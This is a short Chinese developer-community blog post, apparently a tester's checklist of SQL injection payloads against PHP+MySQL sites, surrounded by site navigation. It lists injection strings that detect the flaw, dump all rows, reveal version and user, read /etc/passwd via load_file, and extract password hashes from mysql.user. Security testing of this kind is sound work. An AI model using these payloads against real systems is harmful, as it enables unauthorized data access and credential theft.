备案控制台
探索云世界
开发者社区 数据库 文章 正文

PHP+MySQL 网站 SQL 注入攻击测试用例

2017-07-03 2509
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云数据库 RDS MySQL Serverless,0.5-2RCU 50GB
推荐场景:
学生管理系统数据库设计 搭建个人博客
简介:

SQL注入攻击测试用例

说明

Night
Night’ and 1=1#
Night’ and 1=2#

判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同

Night’ or 1=1#

返回所有数据,常用于有搜索功能的页面

Night’ union select version()#

返回数据库版本信息

Night’ union select database()#

返回当前的库名

Night’ union select user()#

返回数据库的用户名信息

Night’ union select session_user()#

Night’ union select system_user()#

Night’ union select load_file(‘/etc/passwd’)#

读取系统文件

Night’ select user ,password from mysql.user#

返回数据库用户的密码信息,密码一般以MD5的方式存放


最新内容请见作者的GitHub页:http://qaseven.github.io/

文章标签:
云数据库 RDS MySQL 版
测试技术
SQL
数据库
数据安全/隐私保护
安全
关键词:
SQL注入
SQL MySQL
PHP mysql
云数据库 RDS MySQL 版php
网站测试
相关实践学习
基于CentOS快速搭建LAMP环境
本教程介绍如何搭建LAMP环境,其中LAMP分别代表Linux、Apache、MySQL和PHP。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
沉默术士
目录
相关文章
囚徒冇困境
|
1月前
|
SQL 监控 安全
SQL注入的实现原理以及防止
SQL注入的实现原理以及防止
囚徒冇困境
26 0
hhzz
|
1月前
|
SQL Java 应用服务中间件
Java项目防止SQL注入的四种方案
Java项目防止SQL注入的四种方案
hhzz
37 0
Y小夜
|
1月前
|
SQL 关系型数据库 MySQL
【MySQL】— —熟练掌握用SQL语句实现数据库和基本表的创建。熟练掌握MySQL的安装、客户端登录方法;熟练掌握MySQL的编码、数据类型等基础知识;掌握实体完整性的定义和维护方法、掌握参照完整性
【MySQL】— —熟练掌握用SQL语句实现数据库和基本表的创建。熟练掌握MySQL的安装、客户端登录方法;熟练掌握MySQL的编码、数据类型等基础知识;掌握实体完整性的定义和维护方法、掌握参照完整性
Y小夜
99 1
风水道人
|
18天前
|
SQL 关系型数据库 MySQL
mysql一条sql查询出多个统计结果
mysql一条sql查询出多个统计结果
风水道人
13 0
憧憬blog
|
28天前
|
SQL 安全 关系型数据库
MySQL安全性:防止攻击和保护数据
MySQL安全性:防止攻击和保护数据
憧憬blog
34 1
东方睿赢
|
1天前
|
SQL 安全 Go
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
在Python Web开发中,确保应用安全至关重要,主要防范SQL注入、XSS和CSRF攻击。措施包括:使用参数化查询或ORM防止SQL注入;过滤与转义用户输入抵御XSS;添加CSRF令牌抵挡CSRF;启用HTTPS保障数据传输安全;实现强身份验证和授权系统;智能处理错误信息;定期更新及审计以修复漏洞;严格输入验证;并培训开发者提升安全意识。持续关注和改进是保证安全的关键。
东方睿赢
9 0
坠入极夜的夏
|
4天前
|
PHP
web简易开发——通过php与HTML+css+mysql实现用户的登录,注册
web简易开发——通过php与HTML+css+mysql实现用户的登录,注册
坠入极夜的夏
16 0
给我杯冰美式
|
9天前
|
SQL 安全 PHP
CTF--Web安全--SQL注入之Post-Union注入
CTF--Web安全--SQL注入之Post-Union注入
给我杯冰美式
12 0
LightOf
|
11天前
|
SQL 存储 关系型数据库
【MySQL实战笔记】02.一条SQL更新语句是如何执行的-2
【4月更文挑战第5天】两阶段提交是为确保`redo log`和`binlog`逻辑一致,避免数据不一致。若先写`redo log`, crash后数据可能丢失,导致恢复后状态错误;若先写`binlog`,crash则可能导致重复事务,影响数据库一致性。一天一备相较于一周一备,能缩短“最长恢复时间”,但需权衡额外的存储成本。
LightOf
16 1
爱吃糖的范同学
|
18天前
|
SQL 关系型数据库 MySQL
【MySQL】慢SQL分析流程
【4月更文挑战第1天】【MySQL】慢SQL分析流程
爱吃糖的范同学
29 1

热门文章

最新文章

  • 1
    深入理解自动化测试框架Selenium的设计与实现
  • 2
    探索AI在软件测试中的应用与挑战
  • 3
    【软件设计师备考 专题 】模块测试的方法和实践
  • 4
    【软件设计师备考 专题 】系统实施:程序设计和系统测试
  • 5
    【软件设计师备考 专题 】如何编写有效的测试报告
  • 6
    提升软件测试效率:AI驱动的自动化测试策略
  • 7
    【软件设计师备考 专题 】测试要求说明书的编写和应用
  • 8
    【软件设计师备考 专题 】可靠性测试和可靠性评估
  • 9
    【软件设计师备考 专题 】系统集成测试的准备和执行
  • 10
    【软件设计师备考 专题 】性能测试和性能评估
  • 1
    连接和管理RDS
    24
  • 2
    购买和初始化阿里云RDS
    26
  • 3
    rds教程
    27
  • 4
    TiDB与MySQL、PostgreSQL等数据库的比较分析
    81
  • 5
    OBCP实践 - 迁移 MySQL 数据到 OceanBase 集群
    33
  • 6
    Flink CDC产品常见问题之mysql整库同步到starrock时任务挂掉如何解决
    34
  • 7
    TIDB和MySQL的区别
    158
  • 8
    Flink CDC产品常见问题之mysql整库同步到starrock时任务挂掉如何解决
    59
  • 9
    [MySQL]事务原理之redo log,undo log
    41
  • 10
    [MySQL]SQL优化之sql语句优化
    51

    • 相关课程

    更多
  • MySQL企业常见架构与调优经验分享
  • 云数据库MySQL版快速上手教程
  • 阿里云云原生数据仓库AnalyticDB MySQL版 使用教程
  • MySQL实战进阶
  • 数据库及SQL/MySQL基础
  • 云数据库MySQL快速入门

    • 相关电子书

    更多
  • 搭建电商项目架构连接MySQL
  • 搭建4层电商项目架构,实战连接MySQL
  • PolarDB MySQL引擎重磅功能及产品能力盛大发布

    • 相关实验场景

    更多
  • 测试场景(RDS无优惠)
  • MySQL引擎及架构优化
  • 基于EBS部署高性能的MySQL服务
  • 使用Python完成RDS数据开发及分析
  • Excel文件转存到RDS数据库
  • 使用CloudLens采集RDS日志并进行审计分析

    • 推荐镜像

    更多
  • mysql
  • mariadb
  • postgresql
    • 下一篇
    阿里云oss简介和使用流程